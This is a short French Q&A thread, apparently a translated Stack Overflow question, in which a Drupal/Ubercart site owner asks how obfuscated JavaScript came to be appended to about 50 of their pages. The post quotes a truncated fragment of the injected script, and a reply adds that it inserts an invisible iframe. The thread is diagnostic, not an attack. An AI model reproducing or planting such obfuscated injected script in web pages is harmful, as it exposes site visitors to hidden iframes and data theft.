J'ai découvert que mes pages Web (principalement index.php, main.html, include.inc) ont été injectées avec un morceau de codes javascript tout en bas après mon original code.Des morceaux de javascript ajoutés aux pages Web sur le serveur
<script>try {this.l="";var d=window[unescape("%75%6e%65%73%63%61%70%65")];var M;if(M!='' && M!='a'){M='bt'};var A="";var Mc=new String();var e=null;this.k="";var t;if(t!='' && t!='iX'){t=''};var K=window[d("%52%65%67%45%78%70")];var p=d("%72%65%70%6c%61%63%65");function C(H,Z){var N=d("%5b"
Est-il possible pour les injections SQL pour ajouter le morceau de code js aux pages Web (comme 50 d'entre eux sont infectés)? Ou est-ce un virus sur le serveur lui-même? J'utilise Drupal + Ubercart avec des entrées de formes assez minimes.
Est-ce tout le code? Ce que vous avez posté semble assez inoffensif. Cela ne fait rien. Si vous pouviez poster le code ou le lien vers une page "infectée", ce serait génial. – mattbasta
Désolé je ne me suis pas assez clair, le code js ajoutera un iframe invisible à la page, c'est voler des informations je suppose. – SteD